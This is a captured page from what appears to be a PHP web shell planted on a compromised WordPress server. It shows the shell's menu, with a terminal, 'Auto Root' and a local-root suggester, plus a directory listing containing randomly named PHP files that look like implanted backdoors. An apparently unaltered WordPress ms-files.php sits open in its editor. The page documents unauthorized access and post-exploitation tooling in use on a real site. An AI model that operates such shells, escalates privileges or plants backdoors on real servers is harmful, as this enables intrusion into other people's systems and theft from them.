Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.145.115.135
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
certificates /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
NPEaoneGq.php
329
B
-rw-r--r--
2025-05-09 05:54
aOtxjgNG-20250514033210.php
2.46
KB
-rw-r--r--
2025-05-09 05:54
autosave.min.js
5.67
KB
-rw-r--r--
2023-02-02 16:36
block-bindings.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
cache-compat-20250514093141.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-network.php
12.01
KB
-rw-r--r--
2024-11-13 12:36
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-rewrite.php
62.2
KB
-rw-r--r--
2024-11-13 12:36
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
edit-site.min.js
626.11
KB
-rw-r--r--
2025-04-15 17:44
feed-rss.php
1.16
KB
-rw-r--r--
2020-01-29 00:45
handlers.min.js
1.25
KB
-rw-r--r--
2017-09-21 16:35
media-grid.min.js
12.95
KB
-rw-r--r--
2025-04-15 17:44
ms-files-20250514092528.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
pluggable-deprecated.php
6.18
KB
-rw-r--r--
2025-04-15 17:44
plugin.php
34.74
KB
-rw-r--r--
2024-07-16 17:55
rss.php
22.57
KB
-rw-r--r--
2024-11-13 12:36
spl-autoload-compat.php
441
B
-rw-r--r--
2020-11-12 11:17
wordcount.min.js
2.42
KB
-rw-r--r--
2024-04-03 05:49
wp-api.min-20250513212756.js
14.34
KB
-rw-r--r--
2023-02-02 16:36
wp-emoji-in.min.js
4.85
KB
-rw-r--r--
2025-05-12 08:50
wp-util.min-20250513213609.js
1.39
KB
-rw-r--r--
2022-09-20 03:52
Save
Rename
<?php /** * Multisite upload handler. * * @since 3.0.0 * * @package WordPress * @subpackage Multisite */ define( 'MS_FILES_REQUEST', true ); define( 'SHORTINIT', true ); /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; if ( ! is_multisite() ) { die( 'Multisite support not enabled' ); } ms_file_constants(); if ( '1' === $current_blog->archived || '1' === $current_blog->spam || '1' === $current_blog->deleted ) { status_header( 404 ); die( '404 — File not found.' ); } $file = rtrim( BLOGUPLOADDIR, '/' ) . '/' . str_replace( '..', '', $_GET['file'] ); if ( ! is_file( $file ) ) { status_header( 404 ); die( '404 — File not found.' ); } $mime = wp_check_filetype( $file ); if ( false === $mime['type'] && function_exists( 'mime_content_type' ) ) { $mime['type'] = mime_content_type( $file ); } if ( $mime['type'] ) { $mimetype = $mime['type']; } else { $mimetype = 'image/' . substr( $file, strrpos( $file, '.' ) + 1 ); } header( 'Content-Type: ' . $mimetype ); // Always send this. if ( ! str_contains( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) ) { header( 'Content-Length: ' . filesize( $file ) ); } // Optional support for X-Sendfile and X-Accel-Redirect. if ( WPMU_ACCEL_REDIRECT ) { header( 'X-Accel-Redirect: ' . str_replace( WP_CONTENT_DIR, '', $file ) ); exit; } elseif ( WPMU_SENDFILE ) { header( 'X-Sendfile: ' . $file ); exit; } $wp_last_modified = gmdate( 'D, d M Y H:i:s', filemtime( $file ) ); $wp_etag = '"' . md5( $wp_last_modified ) . '"'; header( "Last-Modified: $wp_last_modified GMT" ); header( 'ETag: ' . $wp_etag ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + 100000000 ) . ' GMT' ); // Support for conditional GET - use stripslashes() to avoid formatting.php dependency. if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) { $client_etag = stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ); } else { $client_etag = ''; } if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) { $client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ); } else { $client_last_modified = ''; } // If string is empty, return 0. If not, attempt to parse into a timestamp. $client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0; // Make a timestamp for our most recent modification. $wp_modified_timestamp = strtotime( $wp_last_modified ); if ( ( $client_last_modified && $client_etag ) ? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) ) : ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) ) ) { status_header( 304 ); exit; } // If we made it this far, just serve the file. readfile( $file ); flush();